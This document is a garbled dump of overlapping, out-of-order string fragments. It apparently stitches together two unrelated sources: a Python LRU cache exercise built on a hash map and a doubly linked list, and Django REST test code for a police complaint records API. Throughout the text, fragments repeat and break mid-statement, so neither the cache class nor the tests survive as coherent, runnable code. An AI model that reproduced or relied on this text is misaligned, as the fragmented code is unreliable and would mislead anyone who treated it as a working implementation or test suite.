Update most recently used item Finding Least", "not in self.map: node = self.use_ordering.pop() if node is not None: del self.map[node.data.key]", "capacity < 1: raise ValueError(\"capacity must be a positive integer\") self.capacity: int =", "should map from keys to values (allowing you to insert and retrieve a", "retrieve a value associated with a particular key) and be initialized with a", "assume the keys are integers and the values are strings. (16.25, p533) Solution:", "node.data return data.value return None def put(self, key: str, value: str) -> None:", "does not need to be updated. Eviction: Remove tail of linked list. Get", "updated. Eviction: Remove tail of linked list. Get key from linked list node", "if key in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item =", "of linked list. Get key from linked list node and remove key from", "table. \"\"\" from typing import NamedTuple, Dict from datastructures.linked_list import * class Item(NamedTuple):", "full, it should evict the least recently used item. You can assume the", "into head of linked list. Insert key -> node mapping into hash table.", "most recently used item Finding Least Recently Used: Least recently used item will", "Optional[str]: if key in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item", "linked list node with key, value. Insert into head of linked list. Insert", "Look up node in hash table and return value. Update most recently used", "Least recently used item will be found at the end of the linked", "list. Updating Most Recently Used: Move node to front of linked list. Hash", "item. The cache should map from keys to values (allowing you to insert", "recently used item. 
You can assume the keys are integers and the values", "int): if capacity < 1: raise ValueError(\"capacity must be a positive integer\") self.capacity:", "Used: Least recently used item will be found at the end of the", "self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return data.value return None def put(self,", "self.use_ordering: DLinkedList = DLinkedList() def get(self, key: str) -> Optional[str]: if key in", "key, value. Insert into head of linked list. Insert key -> node mapping", "None def put(self, key: str, value: str) -> None: # eviction if cache", "be found at the end of the linked list. Updating Most Recently Used:", "hash table to point into the nodes of a linked list, which represents", "used item. You can assume the keys are integers and the values are", "you to insert and retrieve a value associated with a particular key) and", "list node with key, value. Insert into head of linked list. Insert key", "table to point into the nodes of a linked list, which represents last-use", "be a positive integer\") self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node] = {}", "in self.map: node: DLinkedList.Node = self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return", "self.map: node = self.use_ordering.pop() if node is not None: del self.map[node.data.key] node =", "linked list. Get key from linked list node and remove key from hash", "a max size. When it is full, it should evict the least recently", "remove key from hash table. \"\"\" from typing import NamedTuple, Dict from datastructures.linked_list", "a positive integer\") self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering:", "Update most recently used item Finding Least Recently Used: Least recently used item", "None: # eviction if cache is full if len(self.map) == self.capacity and key", "key from hash table. 
\"\"\" from typing import NamedTuple, Dict from datastructures.linked_list import", "case O(1) time: Inserting Key, Value Pair: Create a linked list node with", "linked list node and remove key from hash table. \"\"\" from typing import", "typing import NamedTuple, Dict from datastructures.linked_list import * class Item(NamedTuple): key: str value:", "def get(self, key: str) -> Optional[str]: if key in self.map: node: DLinkedList.Node =", "Least Recently Used: Least recently used item will be found at the end", "\"\"\" LRU Cache: Design and build a \"least recently used\" cache, which evicts", "list node and remove key from hash table. \"\"\" from typing import NamedTuple,", "Solution: Use hash table to point into the nodes of a linked list,", "the least recently used item. You can assume the keys are integers and", "Hash table does not need to be updated. Eviction: Remove tail of linked", "associated with a particular key) and be initialized with a max size. When", "used item. The cache should map from keys to values (allowing you to", "with a max size. When it is full, it should evict the least", "recently used item Finding Least Recently Used: Least recently used item will be", "list, which represents last-use ordering. Do the following in average case O(1) time:", "the end of the linked list. Updating Most Recently Used: Move node to", "keys to values (allowing you to insert and retrieve a value associated with", "from datastructures.linked_list import * class Item(NamedTuple): key: str value: str class LruCache: def", "self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return data.value return None def put(self, key:", "into hash table. Retrieving Value by Key: Look up node in hash table", "max size. 
When it is full, it should evict the least recently used", "is not None: del self.map[node.data.key] node = DLinkedList.Node(data=Item(key, value)) self.map[key] = node self.use_ordering.append_left(node)", "the values are strings. (16.25, p533) Solution: Use hash table to point into", "DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList() def get(self, key: str) -> Optional[str]:", "with a particular key) and be initialized with a max size. When it", "integer\") self.capacity: int = capacity self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList =", "Insert into head of linked list. Insert key -> node mapping into hash", "return data.value return None def put(self, key: str, value: str) -> None: #", "Updating Most Recently Used: Move node to front of linked list. Hash table", "to insert and retrieve a value associated with a particular key) and be", "to values (allowing you to insert and retrieve a value associated with a", "end of the linked list. Updating Most Recently Used: Move node to front", "value: str class LruCache: def __init__(self, capacity: int): if capacity < 1: raise", "a linked list, which represents last-use ordering. Do the following in average case", "str, value: str) -> None: # eviction if cache is full if len(self.map)", "Item(NamedTuple): key: str value: str class LruCache: def __init__(self, capacity: int): if capacity", "node mapping into hash table. Retrieving Value by Key: Look up node in", "node is not None: del self.map[node.data.key] node = DLinkedList.Node(data=Item(key, value)) self.map[key] = node", "node in hash table and return value. Update most recently used item Finding", "not need to be updated. Eviction: Remove tail of linked list. 
Get key", "node = self.use_ordering.pop() if node is not None: del self.map[node.data.key] node = DLinkedList.Node(data=Item(key,", "def put(self, key: str, value: str) -> None: # eviction if cache is", "cache is full if len(self.map) == self.capacity and key not in self.map: node", "get(self, key: str) -> Optional[str]: if key in self.map: node: DLinkedList.Node = self.map[key]", "recently used item. The cache should map from keys to values (allowing you", "You can assume the keys are integers and the values are strings. (16.25,", "key not in self.map: node = self.use_ordering.pop() if node is not None: del", "(16.25, p533) Solution: Use hash table to point into the nodes of a", "str) -> None: # eviction if cache is full if len(self.map) == self.capacity", "the keys are integers and the values are strings. (16.25, p533) Solution: Use", "linked list. Updating Most Recently Used: Move node to front of linked list.", "of a linked list, which represents last-use ordering. Do the following in average", "and retrieve a value associated with a particular key) and be initialized with", "Value Pair: Create a linked list node with key, value. Insert into head", "Inserting Key, Value Pair: Create a linked list node with key, value. Insert", "the nodes of a linked list, which represents last-use ordering. Do the following", "the following in average case O(1) time: Inserting Key, Value Pair: Create a", "self.capacity and key not in self.map: node = self.use_ordering.pop() if node is not", "# eviction if cache is full if len(self.map) == self.capacity and key not", "O(1) time: Inserting Key, Value Pair: Create a linked list node with key,", "is full, it should evict the least recently used item. You can assume", "Pair: Create a linked list node with key, value. 
Insert into head of", "= {} self.use_ordering: DLinkedList = DLinkedList() def get(self, key: str) -> Optional[str]: if", "Do the following in average case O(1) time: Inserting Key, Value Pair: Create", "Item = node.data return data.value return None def put(self, key: str, value: str)", "used item will be found at the end of the linked list. Updating", "= self.map[key] self.use_ordering.remove(node) self.use_ordering.append_left(node) data: Item = node.data return data.value return None def", "values are strings. (16.25, p533) Solution: Use hash table to point into the", "time: Inserting Key, Value Pair: Create a linked list node with key, value.", "Most Recently Used: Move node to front of linked list. Hash table does", "p533) Solution: Use hash table to point into the nodes of a linked", "to point into the nodes of a linked list, which represents last-use ordering.", "{} self.use_ordering: DLinkedList = DLinkedList() def get(self, key: str) -> Optional[str]: if key", "self.map: Dict[str, DLinkedList.Node] = {} self.use_ordering: DLinkedList = DLinkedList() def get(self, key: str)", "= self.use_ordering.pop() if node is not None: del self.map[node.data.key] node = DLinkedList.Node(data=Item(key, value))", "be updated. Eviction: Remove tail of linked list. Get key from linked list", "cache should map from keys to values (allowing you to insert and retrieve", "== self.capacity and key not in self.map: node = self.use_ordering.pop() if node is", "found at the end of the linked list. Updating Most Recently Used: Move", "Cache: Design and build a \"least recently used\" cache, which evicts the least", "linked list, which represents last-use ordering. Do the following in average case O(1)", "item will be found at the end of the linked list. Updating Most", "the linked list. 
Updating Most Recently Used: Move node to front of linked", "\"\"\" from typing import NamedTuple, Dict from datastructures.linked_list import * class Item(NamedTuple): key:", "key: str, value: str) -> None: # eviction if cache is full if", "return value. Update most recently used item Finding Least Recently Used: Least recently", "= node.data return data.value return None def put(self, key: str, value: str) ->", "Key: Look up node in hash table and return value. Update most recently", "in average case O(1) time: Inserting Key, Value Pair: Create a linked list", "up node in hash table and return value. Update most recently used item", "Recently Used: Least recently used item will be found at the end of", "-> node mapping into hash table. Retrieving Value by Key: Look up node", "evicts the least recently used item. The cache should map from keys to", "are strings. (16.25, p533) Solution: Use hash table to point into the nodes", "value. Insert into head of linked list. Insert key -> node mapping into" ]
[ "1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True)", "{ 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date':", "'Male', 'age': 18 } ], 'victims': [ { 'race': 'Black', 'gender': 'Male', 'age':", "import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 =", "race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3,", "Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge':", "MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import", "'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago',", "allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233' })", "20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) ) officer =", "AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR", "document', url='http://cr-document.com/', 
file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT", "PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7,", "'<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator',", "= OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0,", "'percentile_trr': '5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [ { 'title': 'CR document', 'file_type':", "'112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233' })", "import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area =", "expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233',", "Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation,", "expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 
'coaccused':", "Ave, Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type':", "Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5,", "{ 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000',", "'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_not_found(self):", "'percentile_allegation': '9.9000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name':", "= InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation,", "'5.5000', 'percentile_allegation': '4.4000', } ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document',", "first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 =", "= AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago',", "reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid':", "'<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 
'category': 'Operation/Personnel Violations', 'percentile_allegation':", ") officer_cache_manager.build_cached_columns() allegation_cache_manager.cache_data() response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '12345'})) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category':", "'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ], 'attachments': [ {", "category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001,", "allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document", "{ 'race': 'Black', 'gender': 'Male', 'age': 53 } ], 'point': { 'lon': 12.0,", "civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2,", "{'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST)", "'2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications", "}) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please", "OfficerAllegationFactory( officer=officer1, 
allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel", "28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator,", "'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal':", "5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory( officer=investigator,", "allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc),", "rest_framework import status from robber import expect import pytz from data.factories import (", "1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, {", "from mock import patch from rest_framework.test import APITestCase from rest_framework import status from", "{'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with(", "'Email already added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk':", "response = 
self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email'", "AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police", "= AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001,", "3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr': '5.5000', } ],", "], 'victims': [ { 'race': 'Black', 'gender': 'Male', 'age': 53 } ], 'point':", "}, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name': '<NAME>', 'badge': 'COPA/IPRA', 'percentile_allegation': '9.9000', 'percentile_allegation_civilian':", "allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3", "officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation)", "'gender': 'Male', 'age': 53 } ], 'point': { 'lon': 12.0, 'lat': 21.0 },", "'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [", "officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase):", "officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), 
allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator =", "current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan", "'45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk':", ") AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR',", "VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006,", "EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory(", "kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'}", "first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU',", "title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document',", "'Black', 'gender': 'Male', 'age': 18 } ], 'victims': [ { 'race': 'Black', 'gender':", "] }) def test_retrieve_badge(self): 
area = AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr',", ") expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233' }) def test_request_document_without_email(self): AllegationFactory(crid='321')", "'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id':", "'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation =", "'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications System', 'beat': 'Lincoln Square', 'involvements':", "InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2,", "expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_allegation(self): response =", "53 } ], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date':", "'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26',", "'2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications System', 'beat':", "'3.3000', } ], 'complainants': [ { 'race': 'Black', 'gender': 'Male', 'age': 18 }", "def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) 
AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'}", "'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category':", "age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26),", "'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000',", "{ 'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ { 'id': 123,", "21.0 }, 'summary': 'Summary', 'incident_date': '2002-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan", "'Male', 'age': 53 } ], 'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary':", "'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count':", "InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory, OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import", "rest_framework.test import APITestCase from rest_framework import status from robber import expect import pytz", "officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993,", "self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}),", "'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': 
'2002-02-28', 'start_date': '2003-03-20',", "city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26)", "allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9,", "AllegationFactory(crid='321') response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter", "url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT )", "'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations',", ") OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation = AllegationFactory( crid='12345', point=Point(12, 21), incident_date=datetime(2002, 2, 28,", "allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None", "birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, ) OfficerBadgeNumberFactory(officer=officer1, star='12345', current=True) allegation =", "expect(response.status_code).to.eq(status.HTTP_200_OK) expect(dict(response.data)).to.eq({ 'crid': '12345', 'most_common_category': { 'category': 'Operation/Personnel Violations', 
'allegation_name': 'Secondary/Special Employment' },", "officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1,", "InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory(", "}, { 'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation':", "tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4", "AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation,", "'point': { 'lon': 12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20',", "'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', },", "import reverse from django.contrib.gis.geos import Point from mock import patch from rest_framework.test import", "5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment' ) ) officer = OfficerFactory( id=3,", "self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid 
email' }) def", "id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='AR', allegation=allegation, title='CR document 2', id='654321', url='http://AR-document.com/', file_type=MEDIA_TYPE_DOCUMENT", "last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1,", "'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation':", "'6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>',", "= self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for", "for subscribing', 'crid': '112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST)", "'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_not_found(self): response =", "[ { 'race': 'Black', 'gender': 'Male', 'age': 53 } ], 'point': { 'lon':", "AreaFactory(name='Lincoln Square') officer1 = OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1,", "officer=officer1, allegation=allegation, 